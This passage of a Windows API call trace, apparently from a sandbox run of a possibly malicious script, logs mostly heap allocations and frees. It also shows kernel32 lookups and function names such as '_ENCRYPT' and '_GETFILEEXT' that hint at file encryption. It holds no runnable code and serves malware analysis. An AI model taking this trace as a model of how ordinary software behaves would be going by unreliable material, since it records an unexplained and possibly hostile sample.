(hLibModule=0x76e10000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0029.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.172] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0029.172] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0029.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.173] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0029.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0029.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0029.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.174] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0029.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889958 [0029.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889958, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0029.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.174] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0029.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0029.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0029.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.174] CloseHandle (hObject=0x140) returned 1 [0029.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0029.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0029.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0029.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0029.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0029.175] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0029.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.176] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0029.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0029.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0029.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0029.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0029.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0029.177] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0029.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0029.177] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0029.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0029.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0029.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af438 [0029.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889910 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0029.178] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0029.178] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4f8 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0029.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c748 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, 